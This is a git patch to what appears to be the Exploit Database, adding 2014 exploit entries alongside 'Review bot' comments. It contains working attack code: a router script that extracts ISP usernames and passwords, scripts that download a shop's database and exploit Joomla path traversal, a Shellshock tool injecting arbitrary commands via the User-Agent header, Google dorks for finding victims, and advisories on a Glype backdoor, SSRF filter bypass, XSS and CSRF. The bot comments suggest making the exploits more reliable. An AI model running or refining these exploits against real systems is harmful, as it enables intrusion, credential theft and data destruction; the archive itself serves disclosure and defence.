From dd094ab0a76463634846e354a0e01a38614a51cc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 26 Sep 2014 04:44:01 +0000
Subject: [PATCH] Updated 09_26_2014

---
 files.csv | 19 ++-
 platforms/asp/webapps/34753.py | 80 +++++++++
 platforms/hardware/webapps/34751.pl | 46 +++++
 platforms/linux/remote/34765.txt | 15 ++
 platforms/linux/remote/34766.php | 45 +++++
 platforms/php/webapps/34637.txt | 2 +-
 platforms/php/webapps/34718.txt | 24 +++
 platforms/php/webapps/34754.py | 114 +++++++++++++
 platforms/php/webapps/34755.py | 112 +++++++++++++
 platforms/php/webapps/34758.txt | 84 ++++++++++
 platforms/php/webapps/34759.txt | 54 ++++++
 platforms/php/webapps/34760.txt | 29 ++++
 platforms/php/webapps/34761.txt | 55 ++++++
 platforms/php/webapps/34762.txt | 52 ++++++
 platforms/php/webapps/34763.txt | 49 ++++++
 platforms/php/webapps/34764.txt | 249 ++++++++++++++++++++++++++++
 platforms/windows/dos/34752.c | 49 ++++++
 platforms/windows/remote/34756.rb | 121 ++++++++++++++
 platforms/windows/remote/34757.rb | 163 ++++++++++++++++++
 19 files changed, 1360 insertions(+), 2 deletions(-)
 create mode 100755 platforms/asp/webapps/34753.py
 create mode 100755 platforms/hardware/webapps/34751.pl
 create mode 100755 platforms/linux/remote/34765.txt
 create mode 100755 platforms/linux/remote/34766.php
 create mode 100755 platforms/php/webapps/34718.txt
 create mode 100755 platforms/php/webapps/34754.py
 create mode 100755 platforms/php/webapps/34755.py
 create mode 100755 platforms/php/webapps/34758.txt
 create mode 100755 platforms/php/webapps/34759.txt
 create mode 100755 platforms/php/webapps/34760.txt
 create mode 100755 platforms/php/webapps/34761.txt
 create mode 100755 platforms/php/webapps/34762.txt
 create mode 100755 platforms/php/webapps/34763.txt
 create mode 100755 platforms/php/webapps/34764.txt
 create mode 100755 platforms/windows/dos/34752.c
 create mode 100755 platforms/windows/remote/34756.rb
 create mode 100755 platforms/windows/remote/34757.rb
diff --git a/files.csv b/files.csv
index ef3337a2f..7dd2e6906 100755
--- a/files.csv
+++ b/files.csv
@@ -31188,7 +31188,7 @@ id,file,description,date,author,platform,type,port
 34634,platforms/php/webapps/34634.txt,"Multple I-Escorts Products 'escorts_search.php' Cross-Site Scripting Vulnerabilities",2010-09-15,"599eme Man",php,webapps,0
 34635,platforms/php/webapps/34635.txt,"Willscript Auction Website Script 'category.php' SQL Injection Vulnerability",2009-08-06,"599eme Man",php,webapps,0
 34636,platforms/php/webapps/34636.txt,"NWS-Classifieds 'cmd' Parameter Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
-34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 4.3 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
+34637,platforms/php/webapps/34637.txt,"Joomla Spider Form Maker <= 3.4 - SQLInjection",2014-09-12,"Claudio Viviani",php,webapps,0
 34639,platforms/php/webapps/34639.txt,"CMScout IBrowser TinyMCE Plugin 2.3.4.3 Local File Include Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34640,platforms/php/webapps/34640.txt,"Mollify 1.6 'index.php' Cross Site Scripting Vulnerability",2010-09-15,"John Leitch",php,webapps,0
 34641,platforms/php/webapps/34641.py,"chillyCMS 2.3.4.3 Arbitrary File Upload Vulnerability",2010-09-15,"John Leitch",php,webapps,0
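Review bot: The corrected 34637 row keeps the description as `SQLInjection` (no space) while the same commit rewrites the advisory's own title in platforms/php/webapps/34637.txt to `SQL Injection`; since the version number is being fixed in both places anyway, the index should take the same spelling, `"Joomla Spider Form Maker <= 3.4 - SQL Injection"`, so a search for the advisory's title matches its index row.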
@@ -31261,6 +31261,7 @@ id,file,description,date,author,platform,type,port
 34713,platforms/php/webapps/34713.txt,"Freelancers placebid.php id Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34714,platforms/php/webapps/34714.txt,"Freelancers post_resume.php jobid Parameter XSS",2009-08-17,Moudi,php,webapps,0
 34715,platforms/php/webapps/34715.txt,"AdQuick 'account.php' Cross Site Scripting Vulnerability",2009-07-20,Moudi,php,webapps,0
+34718,platforms/php/webapps/34718.txt,"M/Monit 3.3.2 - CSRF Vulnerability",2014-09-20,"Dolev Farhi",php,webapps,0
 34720,platforms/windows/dos/34720.pl,"Fast Image Resizer 098 - Local Crash Poc",2014-09-20,"niko sec",windows,dos,0
 34721,platforms/php/webapps/34721.txt,"Livefyre LiveComments Plugin - Stored XSS",2014-09-20,"Brij Kishore Mishra",php,webapps,0
 34722,platforms/php/webapps/34722.txt,"ClassApps SelectSurvey.net - Multiple SQL Injection Vulnerabilities",2014-09-20,BillV-Lists,php,webapps,0
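Review bot: The added 34718 row names the product `M/Monit 3.3.2`, but the advisory it indexes, platforms/php/webapps/34718.txt later in this patch, gives `Application: M/Monit 3.2.2` and `Vulnerable version: <= 3.2.2`, so the index and the advisory disagree on the digits. The index row is what gets searched and should carry the version the author actually tested, most likely `"M/Monit 3.2.2 - CSRF Vulnerability"`; the discrepancy is worth settling with the submitter rather than guessing which side transposed it.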
@@ -31284,3 +31285,19 @@ id,file,description,date,author,platform,type,port
 34747,platforms/php/webapps/34747.txt,"LittleSite 0.1 'file' Parameter Local File Include Vulnerability",2014-09-23,Eolas_Gadai,php,webapps,0
 34748,platforms/php/webapps/34748.txt,"Classified Linktrader Script 'addlink.php' SQL Injection Vulnerability",2009-07-21,Moudi,php,webapps,0
 34749,platforms/php/webapps/34749.txt,"CJ Dynamic Poll Pro 2.0 'admin_index.php' Cross Site Scripting Vulnerability",2009-07-21,Moudi,php,webapps,0
+34751,platforms/hardware/webapps/34751.pl,"ZyXEL Prestig P-660HNU-T1 ISP Credentials Disclosure",2014-09-24,"Sebastián Magof",hardware,webapps,80
+34752,platforms/windows/dos/34752.c,"WS10 Data Server SCADA Exploit Overflow PoC",2014-09-24,"Pedro Sánchez",windows,dos,0
+34753,platforms/asp/webapps/34753.py,"Onlineon E-Ticaret Database Disclosure Exploit",2014-09-24,ZoRLu,asp,webapps,80
+34754,platforms/php/webapps/34754.py,"Joomla Face Gallery 1.0 - Multiple vulnerabilities",2014-09-24,"Claudio Viviani",php,webapps,80
+34755,platforms/php/webapps/34755.py,"Joomla Mac Gallery 1.5 - Arbitrary File Download",2014-09-24,"Claudio Viviani",php,webapps,80
+34756,platforms/windows/remote/34756.rb,"EMC AlphaStor Device Manager Opcode 0x75 Command Injection",2014-09-24,metasploit,windows,remote,3000
+34757,platforms/windows/remote/34757.rb,"Advantech WebAccess dvs.ocx GetColor Buffer Overflow",2014-09-24,metasploit,windows,remote,0
+34758,platforms/php/webapps/34758.txt,"Glype 1.4.9 - Cookie Injection Path Traversal LFI",2014-09-24,Securify,php,webapps,80
+34759,platforms/php/webapps/34759.txt,"Glype 1.4.9 - Local Address Filter Bypass",2014-09-24,Securify,php,webapps,80
+34760,platforms/php/webapps/34760.txt,"Restaurant Script (PizzaInn Project) - Stored XSS",2014-09-24,"Kenneth F. 
Belva",php,webapps,80
+34761,platforms/php/webapps/34761.txt,"webEdition 6.3.8.0 (SVN-Revision: 6985) - Path Traversal",2014-09-24,"High-Tech Bridge SA",php,webapps,80
+34762,platforms/php/webapps/34762.txt,"Wordpress Login Widget With Shortcode 3.1.1 - Multiple Vulnerabilities",2014-09-25,dxw,php,webapps,80
+34763,platforms/php/webapps/34763.txt,"OsClass 3.4.1 (index.php, file param) - Local File Inclusion",2014-09-25,Netsparker,php,webapps,80
+34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
+34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
+34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
diff --git a/platforms/asp/webapps/34753.py b/platforms/asp/webapps/34753.py
new file mode 100755
index 000000000..8c7e43699
--- /dev/null
+++ b/platforms/asp/webapps/34753.py
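Review bot: The 34760 row's quoted author field is shown here broken after `Kenneth F.`, with `Belva",php,webapps,80` on the following line. The hunk header's +19 count (3 context rows plus 16 additions) says the file has one physical line per row, so this is most likely a rendering artifact rather than an embedded newline inside the quoted field; if it were a real newline, line-oriented consumers of files.csv would lose the row. A strict CSV parse of the file after the patch is applied settles it either way.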
@@ -0,0 +1,80 @@ +#!/usr/bin/env python +#-*- coding:cp1254 -*- + +# Title : Onlineon E-Ticaret Database Disclosure Exploit (.py) +# dork : inurl:"default.asp?git=sepet" +# Author : ZoRLu / zorlu@milw00rm.com / submit@milw00rm.com +# Home : http://milw00rm.com / its online +# Download : http://www.onlineonweb.com/eticaret.html +# Demo : http://ayvalikkokluzeytincilik.com +# date : 06/09/2014 +# Python : V 2.7 +# Thks : exploit-db.com and others + + +import sys, urllib2, re, os, time + +def indiriyoruz(url): + + import urllib + aldosyayi = urllib.urlopen(url) + indiraq = open(url.split('/')[-1], 'wb') + indiraq.write(aldosyayi.read()) + aldosyayi.close() + indiraq.close() + +if len(sys.argv) < 2: + os.system(['clear','cls'][1]) + print " ____________________________________________________________________" + print "| |" + print "| Onlineon E-Ticaret Database Disclosure Exploit (.py) |" + print "| ZoRLu / milw00rm.com |" + print "| exploit.py http://site.com/path/ |" + print "|____________________________________________________________________|" + sys.exit(1) + +''' link kontrol 1 ''' + +koybasina = "http://" +koykicina = "/" +sitemiz = sys.argv[1] + +if sitemiz[-1:] != koykicina: + sitemiz += koykicina + +if sitemiz[:7] != koybasina: + sitemiz = koybasina + sitemiz + + +database = "db/urun.mdb" +url2 = sitemiz + database +print "\n" + url2 +print "\nlink check" +time.sleep(1) + +''' link kontrol 2 ''' + +try: + adreskontrol = urllib2.urlopen(url2).read() + + if len(adreskontrol) > 0: + + print "\nGood Job Bro!" + +except urllib2.HTTPError: + import os + import sys + print "\nForbidden Err0r, Security!" + sys.exit(1) + + +''' dosya indiriliyor ''' + +if __name__ == '__main__': + import sys + if len(sys.argv) == 2: + print "\nFile is Downloading\n" + try: + indiriyoruz(url2) + except IOError: + print '\nFilename not found.' \ No newline at end of file 
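Review bot: `os.system(['clear','cls'][1])` in the usage branch indexes the two-element list with a constant, so it always runs `cls`; under the `#!/usr/bin/env python` shebang on a Unix host that prints a shell "not found" error instead of clearing the screen. The platform-aware form is `os.system('cls' if os.name == 'nt' else 'clear')`. Smaller points in the same hunk: `re` is imported and never used, and the `import os`/`import sys` inside the `except urllib2.HTTPError` and `__main__` blocks re-import names already bound at the top of the file.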
diff --git a/platforms/hardware/webapps/34751.pl b/platforms/hardware/webapps/34751.pl
new file mode 100755
index 000000000..8f5f8542f
--- /dev/null
+++ b/platforms/hardware/webapps/34751.pl
@@ -0,0 +1,46 @@
+#!/usr/bin/perl
+# Exploit Author: Sebastián Magof
+# Hardware: ZyXEL Prestig P-660HNU-T1
+# Vulnerable file: wzADSL.asp
+# location: http://gateway/cgi-bin/wzADSL.asp
+# Bug: ISP usr+pwd disclosure
+# Type: Local
+# Date: 22/09/2014
+# Vendor Homepage: http://www.zyxel.com/
+# Version: 2.00(AAIJ.1)
+# Tested on: Linux Fedora 20/Windows 7
+# (\/)
+# (**) Alpha (:
+#(")(")
+#usage:perl exploit.pl
+use LWP::UserAgent;
+use HTTP::Request;
+#begin
+print "\n\n************************************************************\n";
+print "* ZyXEL Prestig MODELO P-660HNU-T1v2 local ISP usr+pwd *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina)
+print "************************************************************\n\n";#in oher country modify $url line 25
+
+
+#isp pwd disclosure file
+my $url = "http://192.168.1.1/cgi-bin/wzADSL.asp";
+
+
+#UserAgent
+my $ua = LWP::UserAgent->new();
+$ua->agent("Mozilla/5.0");
+
+
+#Request.
+my $req = HTTP::Request->new(GET => $url);
+my $request = $ua->request($req);
+my $content = $request->content(); #content
+my ($usr) = $content =~ m/name="wan_UserName" size="30" maxlength="128" value="(.+)" >/;
+my ($pwd) = $content =~ m/name="wan_Password" size="30" maxlength="128" value="(.+)">/;
+#ISP usr+pwd Arnet Telecom Argentina;
+print "User: $usr\n";
+print "Password: $pwd\n\n";
+exit(0);
+
+
+
+__EOF__
\ No newline at end of file
diff --git a/platforms/linux/remote/34765.txt b/platforms/linux/remote/34765.txt
new file mode 100755
index 000000000..89ffa85cd
--- /dev/null
+++ b/platforms/linux/remote/34765.txt
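Review bot: `my $request = $ua->request($req);` is never checked with `$request->is_success`, so an unreachable gateway, a redirect to a login page, or a firmware on which the page no longer exists all fall through to the two regexes on an error body and print empty `User:`/`Password:` lines, indistinguishable from a device that genuinely returns blank fields. A guard straight after the request, `die "Request failed: " . $request->status_line . "\n" unless $request->is_success;`, makes the output meaningful when the script is used to verify that a device has been fixed. The header comment's "modify $url line 25" is accurate for the file as written but will drift as soon as the banner changes; naming the variable rather than the line number is more durable.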
@@ -0,0 +1,15 @@
+Exploit Database Note:
+The following is an excerpt from: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
+
+Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like:
+
+$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
+ vulnerable
+ this is a test
+
+The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to:
+
+ $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
+ bash: warning: x: ignoring function definition attempt
+ bash: error importing function definition for `x'
+ this is a test
\ No newline at end of file
diff --git a/platforms/linux/remote/34766.php b/platforms/linux/remote/34766.php
new file mode 100755
index 000000000..a08bfb636
--- /dev/null
+++ b/platforms/linux/remote/34766.php
@@ -0,0 +1,45 @@ +/cgi-bin/ -c cmd + Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit" +Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/ + +Test CGI Code : #!/bin/bash + echo "Content-type: text/html" + echo "" + echo "Bash-is-Vulnerable" + +*/ +error_reporting(0); +if(!defined('STDIN')) die("Please run it through command-line!\n"); +$x = getopt("u:c:"); +if(!isset($x['u']) || !isset($x['c'])) +{ +die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n"); + +} +$url = $x['u']; +$cmd = $x['c']; + + $context = stream_context_create( + array( + 'http' => array( + 'method' => 'GET', + 'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"' + ) + ) + ); + + if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0) + die("Command sent to the server!\n"); + else + die("Connection Error\n"); +?> diff --git a/platforms/php/webapps/34637.txt b/platforms/php/webapps/34637.txt index 593bf3868..c0d0f9de2 100755 --- a/platforms/php/webapps/34637.txt +++ b/platforms/php/webapps/34637.txt @@ -1,6 +1,6 @@ ###################### -# Exploit Title : Joomla Spider Form Maker <= 4.3 SQLInjection +# Exploit Title : Joomla Spider Form Maker <= 3.4 SQL Injection # Exploit Author : Claudio Viviani diff --git a/platforms/php/webapps/34718.txt b/platforms/php/webapps/34718.txt new file mode 100755 index 000000000..cb39b903c --- /dev/null +++ b/platforms/php/webapps/34718.txt 
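Review bot: The closing `if` treats a failed `file_get_contents` together with `500` in `$http_response_header[0]` as proof that the injected command ran, but a 500 can come from any CGI fault unrelated to the payload, a successful fetch — whatever the server did — lands in the `Connection Error` branch, and when the TCP connection itself fails `$http_response_header` is never assigned, a notice that `error_reporting(0)` hides; the usage comment should state that `Command sent to the server!` is a heuristic, not a confirmation. The hunk header promises 45 lines but the `<?php` opener and the first usage lines do not survive in this rendering, so the file's start is outside what is visible here. From the defender's side, the `User-Agent` line shows the `() {` header prefix that CVE-2014-6271 signatures match on, so this PoC is caught by web-log or WAF rules keyed on that prefix.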
@@ -0,0 +1,24 @@ +Vulnerability title: M/Monit CSRF Author: Dolev Farhi Contact: dolevf at +openflare dot com @dolevff Application: M/Monit 3.2.2 Date: 13.9.2014 +Relevant CVEs: N/A Vulnerable version: <= 3.2.2 Fixed version: N/A 1. +About the application ------------------------ Easy, proactive +monitoring of Unix systems, network and cloud services. Conduct +automatic maintenance and recovery and execute meaningful causal actions +in error situations M/Monit expand on Monit's capabilities and provides +monitoring and management of all your Monit enabled hosts via a modern, +clean and well designed user interface which also works on mobile +devices. 2. Vulnerabilities Descriptions: ----------------------------- +It was found that M/Monit latest version is vulnerable to CSRF attacks. +it is possible to reset the password of any user account (admin/regular) +on the system without needing to know the current set password for the +attacked account. 3. Proof of concept exploit +----------------------------
 

CSRF PoC for M/monit

+
+ \ No newline at end of file diff --git a/platforms/php/webapps/34754.py b/platforms/php/webapps/34754.py new file mode 100755 index 000000000..f06322a4e --- /dev/null +++ b/platforms/php/webapps/34754.py 
@@ -0,0 +1,114 @@ +###################### + +# Exploit Title : Joomla Face Gallery 1.0 Multiple Vulnerabilities + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : https://www.apptha.com + +# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/150 + +# Dork Google: inurl:option=com_facegallery + +# Date : 2014-09-17 + +# Tested on : Windows 7 / Mozilla Firefox +# Linux / Mozilla Firefox + +# Info: + +# Joomla Face Gallery 1.0 suffers from SQL injection and Arbitrary file dowwnload vulnerabilities + +# PoC Exploit: +# +# http://localhost/index.php?option=com_facegallery&view=images&aid=[SQLi]&lang=en +# http://localhost/index.php?option=com_facegallery&task=imageDownload&img_name=[../../filename] + +# "aid" and img_name variables are not sanitized. + +###################### + +# Arbitrary file download exploit: + +#!/usr/bin/env python + +# http connection +import urllib, urllib2 +# Args management +import optparse +# Error managemen +import sys + +banner = """ + __ __ _______ + |__.-----.-----.--------| .---.-. | _ .---.-.----.-----. + | | _ | _ | | | _ | |. 1___| _ | __| -__| + | |_____|_____|__|__|__|__|___._| |. __) |___._|____|_____| + |___| |: | + |::.| + `---' + _______ __ __ _____ _______ + | _ .---.-| | .-----.----.--.--. | _ | | _ | + |. |___| _ | | | -__| _| | | |.| |__|. | | + |. | |___._|__|__|_____|__| |___ | `-|. |__|. | | + |: 1 | |_____| |: | |: 1 | + |::.. . | |::.| |::.. . 
| + `-------' `---' `-------' + + j00ml4 F4c3 G4ll3ry 4rb1tr4ry F1l3 D0wnl04d + + Written by: + + Claudio Viviani + + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww +""" + +# Check url +def checkurl(url): + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') + sys.exit(1) + else: + return url + +def connection(url,pathtrav): + try: + response = urllib2.urlopen(url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php') + content = response.read() + if content != "": + print '[!] VULNERABLE' + print '[+] '+url+'/index.php?option=com_facegallery&task=imageDownload&img_name='+pathtrav+'index.php' + else: + print '[X] Not Vulnerable' + except urllib2.HTTPError: + print '[X] HTTP Error' + except urllib2.URLError: + print '[X] Connection Error' + +commandList = optparse.OptionParser('usage: %prog -t URL') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", + ) +options, remainder = commandList.parse_args() + +# Check args +if not options.target: + print(banner) + commandList.print_help() + sys.exit(1) + +print(banner) + +url = checkurl(options.target) +pathtrav = "../../" + +connection(url,pathtrav) diff --git a/platforms/php/webapps/34755.py b/platforms/php/webapps/34755.py new file mode 100755 index 000000000..93381dab7 --- /dev/null +++ b/platforms/php/webapps/34755.py 
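Review bot: `#!/usr/bin/env python` appears only after the comment banner (the file's first line is `######################`), so despite `new file mode 100755` the kernel never sees it and `./34754.py` is handed to `/bin/sh`; the same layout is in platforms/php/webapps/34755.py in the next hunk. Move the shebang to line 1 in both files, or drop the executable bit. Minor points shared by both: `urllib` is imported and never used, `remainder` from `parse_args()` is unused, and the `checkurl` message misspells `protocol` as `procotol`.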
@@ -0,0 +1,112 @@ +###################### + +# Exploit Title : Joomla Mac Gallery <= 1.5 Arbitrary File Download + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : https://www.apptha.com + +# Software Link : https://www.apptha.com/downloadable/download/sample/sample_id/18 + +# Dork Google: inurl:option=com_macgallery + +# Date : 2014-09-17 + +# Tested on : Windows 7 / Mozilla Firefox + +# Linux / Mozilla Firefox + +# Info: + +# Joomla Mac Gallery suffers from Arbitrary File Download vulnerability + +# PoC Exploit: + +#http://localhost/index.php?option=com_macgallery&view=download&albumid=[../../filename] + +#"album_id" variable is not sanitized. + +###################### + +#!/usr/bin/env python + +# http connection +import urllib, urllib2 +# Args management +import optparse +# Error managemen +import sys + +banner = """ + __ __ ___ ___ + |__.-----.-----.--------| .---.-. | Y .---.-.----. + | | _ | _ | | | _ | |. | _ | __| + | |_____|_____|__|__|__|__|___._| |. \_/ |___._|____| + |___| |: | | + |::.|:. | + `--- ---' + _______ __ __ _____ _______ + | _ .---.-| | .-----.----.--.--. | _ | | _ | + |. |___| _ | | | -__| _| | | |.| |__| 1___| + |. | |___._|__|__|_____|__| |___ | `-|. |__|____ | + |: 1 | |_____| |: | |: 1 | + |::.. . | |::.| |::.. . 
| + `-------' `---' `-------' + + j00ml4 M4c G4ll3ry <= 1.5 4rb1tr4ry F1l3 D0wnl04d + + Written by: + + Claudio Viviani + + http://www.homelab.it + + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww +""" + +# Check url +def checkurl(url): + if url[:8] != "https://" and url[:7] != "http://": + print('[X] You must insert http:// or https:// procotol') + sys.exit(1) + else: + return url + +def connection(url,pathtrav): + try: + response = urllib2.urlopen(url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php') + content = response.read() + if content != "": + print '[!] VULNERABLE' + print '[+] '+url+'/index.php?option=com_macgallery&view=download&albumid='+pathtrav+'index.php' + else: + print '[X] Not Vulnerable' + except urllib2.HTTPError: + print '[X] HTTP Error' + except urllib2.URLError: + print '[X] Connection Error' + +commandList = optparse.OptionParser('usage: %prog -t URL') +commandList.add_option('-t', '--target', action="store", + help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", + ) +options, remainder = commandList.parse_args() + +# Check args +if not options.target: + print(banner) + commandList.print_help() + sys.exit(1) + +print(banner) + +url = checkurl(options.target) +pathtrav = "../../" + +connection(url,pathtrav) diff --git a/platforms/php/webapps/34758.txt b/platforms/php/webapps/34758.txt new file mode 100755 index 000000000..657f0c994 --- /dev/null +++ b/platforms/php/webapps/34758.txt 
@@ -0,0 +1,84 @@ +------------------------------------------------------------------------ +Glype proxy cookie jar path traversal allows code execution +------------------------------------------------------------------------ +Securify, September 2014 + +------------------------------------------------------------------------ +Abstract +------------------------------------------------------------------------ +A path traversal vulnerability has been identified in the Glype +web-based proxy that allows an attacker to run arbitrary PHP code on the +server or to remove critical files from the filesystem. This only +affects servers that are configured to: + +- store Glype cookies locally; AND +- disable PHP display_errors; AND +- allow the webserver process to write to the filesystem (document +root). + +------------------------------------------------------------------------ +Affected versions +------------------------------------------------------------------------ +This issue has been identified in Glype 1.4.9. Older version are most +likely affected as well. + +------------------------------------------------------------------------ +Fix +------------------------------------------------------------------------ +Glype was informed and a fixed version (1.4.10) is now available at +www.glype.com + +------------------------------------------------------------------------ +Details +------------------------------------------------------------------------ +http://www.securify.nl/advisory/SFY20140901/glype_proxy_cookie_jar_path_traversal_allows_code_execution.html + +File creation via path traversal + +When the "Store cookies on server" option is set in admin.php, Glype will create a cookie jar on the server to store a user's cookies. The filename for the cookie jar is created using the user's session ID. + +browse.php + +$toSet[CURLOPT_COOKIEFILE] = $toSet[CURLOPT_COOKIEJAR] = $CONFIG['cookies_folder'] . 
session_id(); +PHP takes this session ID from a cookie, so the value returned by session_id() is under control of the user. By using path traversal a user can overwrite or create any file on the server with the rights of the webserver's system user. + +Code execution + +As a POC the following steps were taken to create and run a malicious PHP file in the webroot: + +1. Glype was installed with the "Store cookies on server" option set in admin.php. The cookie directory remained default (tmp/cookies/). +2. A request was initiated with the Glype session cookie's value set to "../../test.php". +3. The Glype proxy was used to surf to a Securify controlled domain that returned a header that set a cookie containing a malicious PHP script. + +Set-Cookie: TestCookie=; expires=Thu, 31-Aug-2014 19:14:10 GMT + +This caused Glype to write this PHP backdoor to test.php in the webroot. When requested using a browser, PHP parses the cookie jar file containing the malicious PHP code. + +The following Python code can be used as a simple test to verify if your Glype installation is affected: + +import urllib2 + +server = 'http://' +url = '/browse.php?u=http%3A%2F%2Fwww.glype.com&b=28' + +req = urllib2.Request(server + url) +req.add_header('Referer', server) +req.add_header('Cookie', 's=../securify') +r = urllib2.urlopen(req) + +You are affected if a file named "securify" is created outside of the cookie directory. + +Arbitrary file removal + +The following code is affected by a (similar) path traversal vulnerability allowing an attacker to remove any file the HTTP process has access to: + +includes/process.php + +# Look for cookie file and check writable +if ( is_writable($file = $CONFIG['cookies_folder'] . session_id()) ) { + + # Delete it + unlink($file); +} + +This can for example be exploited to put a Glype server out of service or to clear log files. \ No newline at end of file 
diff --git a/platforms/php/webapps/34759.txt b/platforms/php/webapps/34759.txt new file mode 100755 index 000000000..fa5323bb0 --- /dev/null +++ b/platforms/php/webapps/34759.txt 
@@ -0,0 +1,54 @@
+------------------------------------------------------------------------
+Glype proxy local address filter bypass
+------------------------------------------------------------------------
+Securify, September 2014
+
+------------------------------------------------------------------------
+Abstract
+------------------------------------------------------------------------
+A vulnerability has been identified in the Glype web-based proxy. Glype
+has a filter to disallow users from surfing to local addresses, to
+prevents users from attacking the local server/network Glype is running
+on. The filter can easily be bypassed by using IPs in decimal form.
+
+------------------------------------------------------------------------
+Affected versions
+------------------------------------------------------------------------
+This issue has been identified in Glype 1.4.9. Older version are most
+likely affected as well.
+
+------------------------------------------------------------------------
+Fix
+------------------------------------------------------------------------
+Glype was informed and a fixed version (1.4.10) is now available at
+www.glype.com
+
+------------------------------------------------------------------------
+Details
+------------------------------------------------------------------------
+http://www.securify.nl/advisory/SFY20140902/glype_proxy_local_address_filter_bypass.html
+
+Glype local address bypass
+
+Glype uses the following code (regex) to filter out internal/local addresses. This is intended to prevent proxy users from attacking local/internal resources through Glype. 
+
+browse.php
+# Protect LAN from access through proxy (protected addresses copied from PHProxy)
+if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
+ error('banned_site', $URL['host']);
+}
+
+This regex can easily be bypassed by using a decimal format IP address, which allows an attacker to browse/attack the internal server/network Glype is running on.
+
+For example, if a server running Glype also runs phpmyadmin or another admin panel on local host, browsing to http://2130706433/phpmyadmin (2130706433 equals 127.0.0.1 in decimal) causes Glype to create a local connection to phpmyadmin, allowing remote access. Other internal web pages running on the internal network could be accessed like this as well.
+
+Possible fix
+
+Resolving the hostname using PHP’s gethostbyname before using the regular expression will eliminate this bypass.
+
+$URL['host'] = gethostbyname($URL['host’]);
+
+# Protect LAN from access through proxy (protected addresses copied from PHProxy)
+if ( preg_match('#^(?:127\.|192\.168\.|10\.|172\.(?:1[6-9]|2[0-9]|3[01])\.|localhost)#i', $URL['host']) ) {
+ error('banned_site', $URL['host']);
+}
\ No newline at end of file
diff --git a/platforms/php/webapps/34760.txt b/platforms/php/webapps/34760.txt
new file mode 100755
index 000000000..ca68c94f1
--- /dev/null
+++ b/platforms/php/webapps/34760.txt
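Review bot: The "Possible fix" at the end of the hunk does not parse as written: the closing quote in `$URL['host’]` is a typographic apostrophe (U+2019), not `'`, so anyone pasting the snippet gets a PHP syntax error; it should read `$URL['host'] = gethostbyname($URL['host']);`. Beyond the typo, `gethostbyname()` returns its argument unchanged when resolution fails and only ever yields IPv4, so the regex still sees unresolved names and has no view of IPv6 at all, and resolving here while the proxy's HTTP client resolves again at connect time leaves a window between the two lookups. The more robust shape for a proxy is to resolve once, validate the resulting address numerically — `filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)` covers both address families — and connect to that address rather than to the name.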
@@ -0,0 +1,29 @@
+Title: Pizza Inn Registration Stored XSS
+Severity: High
+CVE-ID: CVE-2014-6619
+Release Date: 20 September 2014
+Author: Kenneth F. Belva
+Websites: http://silverbackventuresllc.com
+ http://xssWarrior.com
+ http://securitymaverick.com
+Twitter: @infosecmaverick
+Contact: Please use website contact form.
+Mail:
+URL: http://sourceforge.net/projects/restaurantmis/
+Vendor:
+Remote Exploit: Yes
+
+Discovered with: xssWarrior - http://xssWarrior.com
+
+
+Description:
+============
+
+On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
+
+
+Proof of Concept :
+==================
+
+http://[domain]/PizzaInn/register-exec.php
+fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register
diff --git a/platforms/php/webapps/34761.txt b/platforms/php/webapps/34761.txt
new file mode 100755
index 000000000..a964579ff
--- /dev/null
+++ b/platforms/php/webapps/34761.txt
@@ -0,0 +1,55 @@
+Advisory ID: HTB23227
+Product: webEdition
+Vendor: webEdition e.V.
+Vulnerable Version(s): 6.3.8.0 (SVN-Revision: 6985) and probably prior
+Tested Version: 6.3.8.0 (SVN-Revision: 6985)
+Advisory Publication: August 6, 2014 [without technical details]
+Vendor Notification: August 6, 2014
+Vendor Patch: September 4, 2014
+Public Disclosure: September 17, 2014
